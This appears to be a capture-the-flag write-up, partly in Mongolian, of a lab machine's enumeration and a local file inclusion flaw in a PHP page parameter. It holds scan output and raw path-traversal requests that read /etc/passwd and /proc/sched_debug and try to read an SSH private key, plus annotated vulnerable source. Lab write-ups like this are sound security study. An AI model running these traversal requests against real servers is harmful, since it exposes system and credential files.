1. IP Address

# Machine Address
10.10.11.154

# Local Address
10.10.14.121

2. Nmap & Nikto

Nmap

nmap -sV -sC -oA nmap/retired 10.10.11.154
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-10 05:47 EDT
Nmap scan report for 10.10.11.154
Host is up (0.24s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   3072 77:b2:16:57:c2:3c:10:bf:20:f1:62:76:ea:81:e4:69 (RSA)
|   256 cb:09:2a:1b:b9:b9:65:75:94:9d:dd:ba:11:28:5b:d2 (ECDSA)
|_  256 0d:40:f0:f5:a8:4b:63:29:ae:08:a1:66:c1:26:cd:6b (ED25519)
80/tcp open  http    nginx
| http-title: Agency - Start Bootstrap Theme
|_Requested resource was /index.php?page=default.html
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.80 seconds

Nikto

nikto -h 10.10.11.154
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.11.154
+ Target Hostname:    10.10.11.154
+ Target Port:        80
+ Start Time:         2022-04-11 02:57:42 (GMT-4)
---------------------------------------------------------------------------
+ Server: nginx
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: /index.php?page=default.html
+ No CGI Directories found (use '-C all' to force check all possible dirs)                                             

3. Gobuster

CLI

gobuster dir -u http://10.10.11.154 -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt

Result

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.11.154
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/04/11 03:01:50 Starting gobuster in directory enumeration mode
===============================================================
/assets               (Status: 301) [Size: 162] [--> http://10.10.11.154/assets/]
/css                  (Status: 301) [Size: 162] [--> http://10.10.11.154/css/]   
/js                   (Status: 301) [Size: 162] [--> http://10.10.11.154/js/]

-x php нэмээд үзвэл:

gobuster dir -u http://10.10.11.154/ -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -x php

4. Feroxbuster

CLI

feroxbuster -u http://10.10.11.154 -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt

Result

by Ben "epi" Risher 🤓                 ver: 2.3.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.10.11.154
 🚀  Threads               │ 50
 📖  Wordlist              │ /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.3.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
301        7l       11w      162c http://10.10.11.154/js
301        7l       11w      162c http://10.10.11.154/css
301        7l       11w      162c http://10.10.11.154/assets
301        7l       11w      162c http://10.10.11.154/assets/img
301        7l       11w      162c http://10.10.11.154/assets/img/about
301        7l       11w      162c http://10.10.11.154/assets/img/logos
301        7l       11w      162c http://10.10.11.154/assets/img/team
[####################] - 2m    239992/239992  0s      found:7       errors:36     
[####################] - 2m     29999/29999   196/s   http://10.10.11.154
[####################] - 2m     29999/29999   195/s   http://10.10.11.154/js
[####################] - 2m     29999/29999   195/s   http://10.10.11.154/css
[####################] - 2m     29999/29999   195/s   http://10.10.11.154/assets
[####################] - 2m     29999/29999   196/s   http://10.10.11.154/assets/img
[####################] - 2m     29999/29999   196/s   http://10.10.11.154/assets/img/about
[####################] - 2m     29999/29999   195/s   http://10.10.11.154/assets/img/logos
[####################] - 2m     29999/29999   196/s   http://10.10.11.154/assets/img/team

5. LFI

Burp-с;

GET /index.php?page=../../../../../../../../../../etc/passwd HTTP/1.1
Host: 10.10.11.154
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

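Result

Note: the status is 302 with a Location header, yet the body below still carries the requested file. A browser follows the redirect and never displays this body; an intercepting proxy or raw HTTP client does.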

HTTP/1.1 302 Found
Server: nginx
Date: Mon, 11 Apr 2022 09:09:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Location: /index.php?page=default.html
Content-Length: 1488

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:101:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:105::/nonexistent:/usr/sbin/nologin
_chrony:x:105:112:Chrony daemon,,,:/var/lib/chrony:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
vagrant:x:1000:1000::/vagrant:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
dev:x:1001:1001::/home/dev:/bin/bash

passwd-с dev хэрэглэгч /home/dev dir-г харж болж байна.

GET /index.php?page=../../../../../../../../../../home/dev/.ssh/id_rsa HTTP/1.1
GET /index.php?page=../../../../../../../../../../home/dev/user.txt HTTP/1.1

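дээр байгааг үзэхээр болоогүй. (Likely a file-permission limit: the read runs as the PHP worker's account, which would not normally have access to another user's home directory. Not confirmed here.)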

/proc/sched_debug
index.php?page=../../../../../../../../../../proc/sched_debug

index.php

<?php  
// Front controller: streams the file named by the `page` query parameter to the client.
// NOTE(review): nothing in this script confines `page` to the web root. A fix would
// resolve the path (e.g. realpath()) and require it to sit under a fixed base directory,
// or map `page` through an allow-list of known templates.

// Removes the literal substrings "../" and then "./" from $param and returns the result.
// Each str_replace() call is a single pass over its input, so this is substring removal,
// not path canonicalisation, and should not be relied on as a traversal filter.
function sanitize_input($param) {  
 $param1 = str_replace("../","",$param);  
 $param2 = str_replace("./","",$param1);  
 return $param2;  
}  
  
$page = $_GET['page'];  
// Only values that begin with a lowercase ASCII letter are passed through sanitize_input().
if (isset($page) && preg_match("/^[a-z]/", $page)) {  
 $page = sanitize_input($page);  
} else {  
 // Every other case (parameter missing, or a value starting with ".", "/", a digit, ...)
 // only sets a redirect header. The script is not terminated here (no exit/die), so
 // execution falls through to readfile() below with the raw, unsanitised $page.
 // That matches the captured responses: status 302 with file contents in the body.
 header('Location: /index.php?page=default.html');  
}  
  
// Runs on both branches; readfile() writes the named file's bytes to the response as-is.
readfile($page);  
?>

http://10.10.11.154/index.php?page=beta.html beta.html

<form action="activate_license.php" method="post" enctype="multipart/form-data">  
 <label for="formFile" class="form-label">Upload License Key File</label>  
 <input class="form-control form-control-lg" id="formFile" type="file" name="licensefile"/>  
 <button type="submit" class="btn btn-primary">Submit</button>  
</form>

http://10.10.11.154/index.php?page=activate_license.php

GET /index.php?page=activate_license.php HTTP/1.1
Host: 10.10.11.154
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Currently development for EMUEMU just started, but we have big plans. If you bought an OSTRICH console from us and want want to be part of the next step, you can enable your OSTRICH license for usage with EMUEMU via the activate_license application today for our upcoming beta testing program for EMUEMU. A license files contains a 512 bit key. That key is also in the QR code contained within the OSTRICH package. Thank you for participating in our beta testing program. Upload License Key File

activate_license.php

<?php  
// Upload handler: forwards an uploaded "licensefile" to a TCP service on 127.0.0.1:1337
// as a length-prefixed message. Emits no output unless a socket call fails.
if(isset($_FILES['licensefile'])) {  
 // The whole upload is read into memory; the size comes from PHP's upload metadata.
 // NOTE(review): neither content nor size is validated or bounded in this script. The
 // page text describes a 512-bit key, but no such limit is enforced here.
 $license      = file_get_contents($_FILES['licensefile']['tmp_name']);  
 $license_size = $_FILES['licensefile']['size'];  
  
 $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);  
 // Failure is only echoed; execution continues with an invalid $socket.
 if (!$socket) { echo "error socket_create()\n"; }  
  
 // Same pattern: a failed connect is reported but does not stop the writes below.
 if (!socket_connect($socket, '127.0.0.1', 1337)) {  
 echo "error socket_connect()" . socket_strerror(socket_last_error()) . "\n";  
 }  
  
 // Wire format: 4-byte unsigned big-endian length (pack "N"), then the raw file bytes.
 // Both values derive from the uploaded file, so the receiving service has to treat the
 // length prefix as untrusted and bound it itself.
 // NOTE(review): the receiver is not shown here; confirm it checks the length.
 // Return values of socket_write() are ignored, so short writes go unnoticed.
 socket_write($socket, pack("N", $license_size));  
 socket_write($socket, $license);  
  
 socket_shutdown($socket);  
 socket_close($socket);  
}  
?>
GET /index.php?page=../../../../../../../../../../proc/sched_debug HTTP/1.1
Host: 10.10.11.154
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

proc/sched_debug

HTTP/1.1 302 Found
Server: nginx
Date: Wed, 13 Apr 2022 03:51:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Location: /index.php?page=default.html
Content-Length: 26169

Sched Debug Version: v0.11, 5.10.0-11-amd64 #1
ktime                                   : 84680521.804596
sched_clk                               : 84680203.312486
cpu_clk                                 : 84680188.015484
jiffies                                 : 4316062397
sched_clock_stable()                    : 1

sysctl_sched
  .sysctl_sched_latency                    : 12.000000
  .sysctl_sched_min_granularity            : 1.500000
  .sysctl_sched_wakeup_granularity         : 2.000000
  .sysctl_sched_child_runs_first           : 0
  .sysctl_sched_features                   : 16722747
  .sysctl_sched_tunable_scaling            : 1 (logarithmic)

cpu#0, 2994.375 MHz
  .nr_running                    : 1
  .nr_switches                   : 5155430
  .nr_uninterruptible            : 97
  .next_balance                  : 4316.062369
  .curr->pid                     : 13721
  .clock                         : 84680187.755306
  .clock_task                    : 84680187.755306
  .avg_idle                      : 882136
  .max_idle_balance_cost         : 500000

cfs_rq[0]:/
  .exec_clock                    : 0.000000
  .MIN_vruntime                  : 0.000001
  .min_vruntime                  : 470279.159394
  .max_vruntime                  : 0.000001
  .spread                        : 0.000000
  .spread0                       : 0.000000
  .nr_spread_over                : 0
  .nr_running                    : 1
  .load                          : 1048576
  .load_avg                      : 9
  .runnable_avg                  : 9
  .util_avg                      : 9
  .util_est_enqueued             : 8
  .removed.load_avg              : 0
  .removed.util_avg              : 0
  .removed.runnable_avg          : 0
  .tg_load_avg_contrib           : 0
  .tg_load_avg                   : 0
  .throttled                     : 0
  .throttle_count                : 0

rt_rq[0]:
  .rt_nr_running                 : 0
  .rt_nr_migratory               : 0
  .rt_throttled                  : 0
  .rt_time                       : 0.000000
  .rt_runtime                    : 950.000000

dl_rq[0]:
  .dl_nr_running                 : 0
  .dl_nr_migratory               : 0
  .dl_bw->bw                     : 996147
  .dl_bw->total_bw               : 0

runnable tasks:
 S            task   PID         tree-key  switches  prio     wait-time             sum-exec        sum-sleep
-------------------------------------------------------------------------------------------------------------
 S         systemd     1    470273.931361     26356   120         0.000000     12154.194523         0.000000 0 0 /
 S        kthreadd     2    470118.249610       798   120         0.000000        43.232385         0.000000 0 0 /
 I          rcu_gp     3        13.977682         2   100         0.000000         0.004629         0.000000 0 0 /
 I      rcu_par_gp     4        15.978414         2   100         0.000000         0.002695         0.000000 0 0 /
 I    kworker/0:0H     6       728.727785         4   100         0.000000         0.023474         0.000000 0 0 /
 I    mm_percpu_wq     9        22.732288         2   100         0.000000         0.002565         0.000000 0 0 /
 S rcu_tasks_rude_    10        24.733774         2   120         0.000000         0.002515         0.000000 0 0 /
 S rcu_tasks_trace    11        26.734425         2   120         0.000000         0.002135         0.000000 0 0 /
 S     ksoftirqd/0    12    470273.303445    234438   120         0.000000      3866.137484         0.000000 0 0 /
 I       rcu_sched    13    470278.635149   1398813   120         0.000000     17658.025786         0.000000 0 0 /
 S     migration/0    14         0.000000     21279     0         0.000000       443.966905         0.000000 0 0 /
 S         cpuhp/0    15      2355.724616        10   120         0.000000         0.209440         0.000000 0 0 /
 I           netns    24        64.773608         2   100         0.000000         0.028563         0.000000 0 0 /
 S      khungtaskd    26    470147.700559       702   120         0.000000        79.915165         0.000000 0 0 /
 S      oom_reaper    27        74.895783         2   120         0.000000         0.000000         0.000000 0 0 /
 I       writeback    28        80.895780         2   100         0.000000         0.000000         0.000000 0 0 /
 S            ksmd    30        92.895774         2   125         0.000000         0.000000         0.000000 0 0 /
 I     kintegrityd    49       374.954142         2   100         0.000000         0.000000         0.000000 0 0 /
 I         kblockd    50       380.954139         2   100         0.000000         0.000000         0.000000 0 0 /
 I     edac-poller    52       666.594020         2   100         0.000000         0.000000         0.000000 0 0 /
 I    kworker/0:1H    54    470273.162678     44338   100         0.000000      1002.530760         0.000000 0 0 /
 S         kswapd0    56       969.541102         3   120         0.000000         0.044243         0.000000 0 0 /
 I        kthrotld    57       767.223323         2   100         0.000000         0.038923         0.000000 0 0 /
 S   irq/24-pciehp    58         0.000000         2    49         0.000000         0.047507         0.000000 0 0 /
 S   irq/26-pciehp    60         0.000000         2    49         0.000000         0.032440         0.000000 0 0 /
 S   irq/28-pciehp    62         0.000000         2    49         0.000000         0.028022         0.000000 0 0 /
 S   irq/30-pciehp    64         0.000000         2    49         0.000000         0.030929         0.000000 0 0 /
 S   irq/32-pciehp    66         0.000000         2    49         0.000000         0.102563         0.000000 0 0 /
 S   irq/34-pciehp    68         0.000000         2    49         0.000000         0.033433         0.000000 0 0 /
 S   irq/36-pciehp    70         0.000000         2    49         0.000000         0.048562         0.000000 0 0 /
 S   irq/38-pciehp    72         0.000000         2    49         0.000000         0.053139         0.000000 0 0 /
 S   irq/40-pciehp    74         0.000000         2    49         0.000000         0.032441         0.000000 0 0 /
 S   irq/42-pciehp    76         0.000000         2    49         0.000000         0.061664         0.000000 0 0 /
 S   irq/44-pciehp    78         0.000000         2    49         0.000000         0.059964         0.000000 0 0 /
 S   irq/46-pciehp    80         0.000000         2    49         0.000000         0.045345         0.000000 0 0 /
 S   irq/48-pciehp    82         0.000000         2    49         0.000000         0.072327         0.000000 0 0 /
 S   irq/50-pciehp    84         0.000000         2    49         0.000000         0.046387         0.000000 0 0 /
 S   irq/52-pciehp    86         0.000000         2    49         0.000000         0.095389         0.000000 0 0 /
 S   irq/54-pciehp    88         0.000000         2    49         0.000000         0.035466         0.000000 0 0 /
 I acpi_thermal_pm    90       900.787224         2   100         0.000000         0.031008         0.000000 0 0 /
 I   ipv6_addrconf    92       905.235396         2   100         0.000000         0.018906         0.000000 0 0 /
 I           kstrp   101       953.365437         2   100         0.000000         0.041096         0.000000 0 0 /
 I    zswap-shrink   104      1008.899177         2   100         0.000000         0.065664         0.000000 0 0 /
 I    kworker/u5:0   105      1012.917683         2   100         0.000000         0.022132         0.000000 0 0 /
 S       scsi_eh_0   151      1318.113572         6   120         0.000000        82.957574         0.000000 0 0 /
 S       scsi_eh_2   159      1559.312628        26   120         0.000000         0.523253         0.000000 0 0 /
 I      mpt_poll_0   160      1238.381341         2   100         0.000000         0.031669         0.000000 0 0 /
 I           mpt/0   161      1241.401738         2   100         0.000000         0.021510         0.000000 0 0 /
 I      scsi_tmf_2   162      1318.093461         2   100         0.000000         0.012252         0.000000 0 0 /
 I      scsi_tmf_3   164      1326.099880         2   100         0.000000         0.008556         0.000000 0 0 /
 I      scsi_tmf_4   166      1330.103473         2   100         0.000000         0.004669         0.000000 0 0 /
 I      scsi_tmf_5   168      1334.122953         2   100         0.000000         0.020759         0.000000 0 0 /
 I      scsi_tmf_6   170      1338.139234         2   100         0.000000         0.017383         0.000000 0 0 /
 S       scsi_eh_7   171      1559.297499        26   120         0.000000         0.312517         0.000000 0 0 /
 I      scsi_tmf_7   172      1342.155522         2   100         0.000000         0.017142         0.000000 0 0 /
 I      scsi_tmf_8   174      1346.169972         2   100         0.000000         0.015570         0.000000 0 0 /
 S       scsi_eh_9   175      1559.343885        26   120         0.000000         0.355466         0.000000 0 0 /
 I      scsi_tmf_9   176      1350.184659         2   100         0.000000         0.015699         0.000000 0 0 /
 S      scsi_eh_10   177      1559.415509        26   120         0.000000         0.414236         0.000000 0 0 /
 I     scsi_tmf_10   178      1354.200381         2   100         0.000000         0.016962         0.000000 0 0 /
 I     scsi_tmf_11   180      1358.214386         2   100         0.000000         0.014997         0.000000 0 0 /
 I     scsi_tmf_12   182      1362.229003         2   100         0.000000         0.015599         0.000000 0 0 /
 I     scsi_tmf_13   184      1366.243037         2   100         0.000000         0.014927         0.000000 0 0 /
 I     scsi_tmf_14   186      1370.257565         2   100         0.000000         0.015620         0.000000 0 0 /
 S      scsi_eh_15   187      1559.283563        26   120         0.000000         0.350127         0.000000 0 0 /
 I     scsi_tmf_15   188      1374.272092         2   100         0.000000         0.015519         0.000000 0 0 /
 S      scsi_eh_16   189      1559.244359        26   120         0.000000         0.308008         0.000000 0 0 /
 I     scsi_tmf_16   190      1378.286038         2   100         0.000000         0.014948         0.000000 0 0 /
 S      scsi_eh_17   191      1559.243517        26   120         0.000000         0.313205         0.000000 0 0 /
 I     scsi_tmf_17   192      1382.416404         2   100         0.000000         0.131477         0.000000 0 0 /
 S      scsi_eh_18   193      1559.257142        26   120         0.000000         0.333966         0.000000 0 0 /
 I     scsi_tmf_18   194      1386.432996         2   100         0.000000         0.017623         0.000000 0 0 /
 I     scsi_tmf_19   196      1390.448174         2   100         0.000000         0.016121         0.000000 0 0 /
 S      scsi_eh_20   197      1559.334488        26   120         0.000000         0.404589         0.000000 0 0 /
 I     scsi_tmf_20   198      1394.464114         2   100         0.000000         0.016892         0.000000 0 0 /
 I     scsi_tmf_21   200      1398.478440         2   100         0.000000         0.015298         0.000000 0 0 /
 I     scsi_tmf_22   202      1402.493539         2   100         0.000000         0.016130         0.000000 0 0 /
 S      scsi_eh_23   203      1559.348615        26   120         0.000000         0.312147         0.000000 0 0 /
 I     scsi_tmf_23   204      1406.505911         2   100         0.000000         0.013285         0.000000 0 0 /
 I     scsi_tmf_24   206      1410.517302         2   100         0.000000         0.012373         0.000000 0 0 /
 S      scsi_eh_25   207      1559.343972        26   120         0.000000         0.309217         0.000000 0 0 /
 I     scsi_tmf_25   208      1414.534994         2   100         0.000000         0.018595         0.000000 0 0 /
 S      scsi_eh_26   209      1559.163536        26   120         0.000000         0.262300         0.000000 0 0 /
 I     scsi_tmf_26   210      1418.549100         2   100         0.000000         0.014989         0.000000 0 0 /
 S      scsi_eh_27   211      1559.186772        26   120         0.000000         0.282339         0.000000 0 0 /
 I     scsi_tmf_27   212      1422.563427         2   100         0.000000         0.015249         0.000000 0 0 /
 I     scsi_tmf_28   214      1426.577082         2   100         0.000000         0.014637         0.000000 0 0 /
 S      scsi_eh_29   215      1559.162677        26   120         0.000000         0.259530         0.000000 0 0 /
 I     scsi_tmf_29   216      1430.590988         2   100         0.000000         0.014778         0.000000 0 0 /
 S      scsi_eh_30   217      1559.178394        26   120         0.000000         0.274322         0.000000 0 0 /
 I     scsi_tmf_30   218      1434.605655         2   100         0.000000         0.015600         0.000000 0 0 /
 S      scsi_eh_31   219      1559.163257        26   120         0.000000         0.259427         0.000000 0 0 /
 S      scsi_eh_32   249      1561.040280         2   120         0.000000         0.035516         0.000000 0 0 /
 I     scsi_tmf_32   250      1565.065283         2   100         0.000000         0.027331         0.000000 0 0 /
 I ext4-rsv-conver   282      1755.018274         3   100         0.000000         0.019756         0.000000 0 0 /
 S   systemd-udevd   348    470187.031091      1458   120         0.000000       283.819041         0.000000 0 0 /
 S           gmain   571     11352.409969       146   120         0.000000         1.806799         0.000000 0 0 /
 S activate_licens   418    446273.871782        30   120         0.000000         9.136912         0.000000 0 0 /
 S            cron   420    470273.288456      2919   120         0.000000       762.280155         0.000000 0 0 /
 S     dbus-daemon   421    470273.611542     18280   120         0.000000      4401.913468         0.000000 0 0 /
 S  systemd-logind   435    470273.458224     18341   120         0.000000      2257.399290         0.000000 0 0 /
 S          hwmon1   476      5018.456000         2   120         0.000000         0.022742         0.000000 0 0 /
 S      php-fpm7.4   534    470274.643375     93194   120         0.000000      5149.097210         0.000000 0 0 /
 S          agetty   537     10135.820186         8   120         0.000000         4.053591         0.000000 0 0 /
 S            sshd   542    457594.772813       369   120         0.000000       108.212769         0.000000 0 0 /
 S           nginx   544    470273.613225   1265337   120         0.000000    256203.405254         0.000000 0 0 /
 S         chronyd   546    464357.367909       129   120         0.000000        14.518773         0.000000 0 0 /
 S         chronyd   547    464357.346779       188   120         0.000000        28.587065         0.000000 0 0 /
 S      php-fpm7.4 13565    469573.518637     70318   120         0.000000     11646.371496         0.000000 0 0 /
 S      php-fpm7.4 13704    470163.882496     52668   120         0.000000     11328.008245         0.000000 0 0 /
>R      php-fpm7.4 13721    470273.193438     52166   120         0.000000      9299.603609         0.000000 0 0 /
 I     kworker/0:1 32426    470274.666697     24804   120         0.000000       717.247851         0.000000 0 0 /
 I    kworker/u4:0 35199    470273.543113      1039   120         0.000000        55.980461         0.000000 0 0 /
 I    kworker/u4:2 35526    470124.294341       416   120         0.000000        23.683800         0.000000 0 0 /
 I     kworker/0:2 35926    469600.704800         9   120         0.000000         0.115347         0.000000 0 0 /
 I    kworker/u4:1 36028    470274.534095        87   120         0.000000         4.921252         0.000000 0 0 /

cpu#1, 2994.375 MHz
  .nr_running                    : 0
  .nr_switches                   : 11377902
  .nr_uninterruptible            : -97
  .next_balance                  : 4316.062370
  .curr->pid                     : 0
  .clock                         : 84680183.209272
  .clock_task                    : 84680183.209272
  .avg_idle                      : 1000000
  .max_idle_balance_cost         : 500000

cfs_rq[1]:/
  .exec_clock                    : 0.000000
  .MIN_vruntime                  : 0.000001
  .min_vruntime                  : 468595.964356
  .max_vruntime                  : 0.000001
  .spread                        : 0.000000
  .spread0                       : -1683.195038
  .nr_spread_over                : 0
  .nr_running                    : 0
  .load                          : 0
  .load_avg                      : 0
  .runnable_avg                  : 0
  .util_avg                      : 0
  .util_est_enqueued             : 0
  .removed.load_avg              : 0
  .removed.util_avg              : 0
  .removed.runnable_avg          : 0
  .tg_load_avg_contrib           : 0
  .tg_load_avg                   : 0
  .throttled                     : 0
  .throttle_count                : 0

rt_rq[1]:
  .rt_nr_running                 : 0
  .rt_nr_migratory               : 0
  .rt_throttled                  : 0
  .rt_time                       : 0.069640
  .rt_runtime                    : 950.000000

dl_rq[1]:
  .dl_nr_running                 : 0
  .dl_nr_migratory               : 0
  .dl_bw->bw                     : 996147
  .dl_bw->total_bw               : 0

runnable tasks:
 S            task   PID         tree-key  switches  prio     wait-time             sum-exec        sum-sleep
-------------------------------------------------------------------------------------------------------------
 S         cpuhp/1    16      1925.910783        10   120         0.000000         0.125863         0.000000 0 0 /
 S     migration/1    17         0.000000     21244     0         0.000000       478.944269         0.000000 0 0 /
 S     ksoftirqd/1    18    468578.705180    234364   120         0.000000      3687.323637         0.000000 0 0 /
 I    kworker/1:0H    20       817.144023         5   100         0.000000         0.031758         0.000000 0 0 /
 S       kdevtmpfs    23      3672.685848       128   120         0.000000         0.895750         0.000000 0 0 /
 S         kauditd    25      1773.778542         7   120         0.000000         1.538124         0.000000 0 0 /
 S      kcompactd0    29    468589.493121    165392   120         0.000000      2888.144105         0.000000 0 0 /
 S      khugepaged    31    468588.783514     14660   139         0.000000      1965.951916         0.000000 0 0 /
 I  blkcg_punt_bio    51        30.719385         2   100         0.000000         0.006112         0.000000 0 0 /
 I      devfreq_wq    53        36.721191         2   100         0.000000         0.003166         0.000000 0 0 /
 S   irq/25-pciehp    59         0.000000         3    49         0.000000         0.059041         0.000000 0 0 /
 S   irq/27-pciehp    61         0.000000         3    49         0.000000         0.059552         0.000000 0 0 /
 S   irq/29-pciehp    63         0.000000         3    49         0.000000         0.060093         0.000000 0 0 /
 S   irq/31-pciehp    65         0.000000         3    49         0.000000         0.139933         0.000000 0 0 /
 S   irq/33-pciehp    67         0.000000         3    49         0.000000         0.073699         0.000000 0 0 /
 S   irq/35-pciehp    69         0.000000         3    49         0.000000         0.068078         0.000000 0 0 /
 S   irq/37-pciehp    71         0.000000         3    49         0.000000         0.080543         0.000000 0 0 /
 S   irq/39-pciehp    73         0.000000         3    49         0.000000         0.118641         0.000000 0 0 /
 S   irq/41-pciehp    75         0.000000         3    49         0.000000         0.083087         0.000000 0 0 /
 S   irq/43-pciehp    77         0.000000         3    49         0.000000         0.072787         0.000000 0 0 /
 S   irq/45-pciehp    79         0.000000         3    49         0.000000         0.153119         0.000000 0 0 /
 S   irq/47-pciehp    81         0.000000         3    49         0.000000         0.063015         0.000000 0 0 /
 S   irq/49-pciehp    83         0.000000         3    49         0.000000         0.060424         0.000000 0 0 /
 S   irq/51-pciehp    85         0.000000         3    49         0.000000         0.074419         0.000000 0 0 /
 S   irq/53-pciehp    87         0.000000         3    49         0.000000         0.084679         0.000000 0 0 /
 S   irq/55-pciehp    89         0.000000         3    49         0.000000         0.074229         0.000000 0 0 /
 I    kworker/1:1H    91    468587.284735     19166   100         0.000000       429.652332         0.000000 0 0 /
 I         ata_sff   150      1064.213540         2   100         0.000000         0.004478         0.000000 0 0 /
 I      scsi_tmf_0   152      1071.218263         2   100         0.000000         0.006162         0.000000 0 0 /
 S       scsi_eh_1   153      1112.506859         4   120         0.000000        11.165957         0.000000 0 0 /
 I      scsi_tmf_1   154      1079.223485         2   100         0.000000         0.008987         0.000000 0 0 /
 S       scsi_eh_3   163      1354.203716        26   120         0.000000         0.318601         0.000000 0 0 /
 S       scsi_eh_4   165      1354.364173        26   120         0.000000         0.594965         0.000000 0 0 /
 S       scsi_eh_5   167      1354.265520        26   120         0.000000         0.378000         0.000000 0 0 /
 S       scsi_eh_6   169      1354.359390        26   120         0.000000         0.474015         0.000000 0 0 /
 S       scsi_eh_8   173      1354.266204        26   120         0.000000         0.299895         0.000000 0 0 /
 S      scsi_eh_11   179      1354.319499        26   120         0.000000         0.347599         0.000000 0 0 /
 S      scsi_eh_12   181      1354.294967        26   120         0.000000         0.327516         0.000000 0 0 /
 S      scsi_eh_13   183      1354.305362        26   120         0.000000         0.333553         0.000000 0 0 /
 S      scsi_eh_14   185      1354.313890        26   120         0.000000         0.297549         0.000000 0 0 /
 S      scsi_eh_19   195      1354.365835        26   120         0.000000         0.338002         0.000000 0 0 /
 S      scsi_eh_21   199      1354.259069        26   120         0.000000         0.231276         0.000000 0 0 /
 S      scsi_eh_22   201      1354.287901        26   120         0.000000         0.261962         0.000000 0 0 /
 S      scsi_eh_24   205      1354.357431        26   120         0.000000         0.329507         0.000000 0 0 /
 S      scsi_eh_28   213      1354.362151        26   120         0.000000         0.334969         0.000000 0 0 /
 I     scsi_tmf_31   220      1326.966833         2   100         0.000000         0.016151         0.000000 0 0 /
 S     jbd2/sda1-8   281    468587.491477     46702   120         0.000000      2213.353470         0.000000 0 0 /
 S systemd-journal   332    468570.029689     74993   120         0.000000     11469.204517         0.000000 0 0 /
 S   VGAuthService   388      3672.933937       102   120         0.000000        24.317929         0.000000 0 0 /
 S        vmtoolsd   389    468591.640059    974905   120         0.000000     75748.585991         0.000000 0 0 /
 S    HangDetector   478    468589.235347     84811   120         0.000000      3271.888116         0.000000 0 0 /
 I          cryptd   394      1821.306494         2   100         0.000000         0.025498         0.000000 0 0 /
 S   irq/16-vmwgfx   398         0.000000    315126    49         0.000000      6109.678753         0.000000 0 0 /
 I        ttm_swap   404      1846.587609         2   100         0.000000         0.005039         0.000000 0 0 /
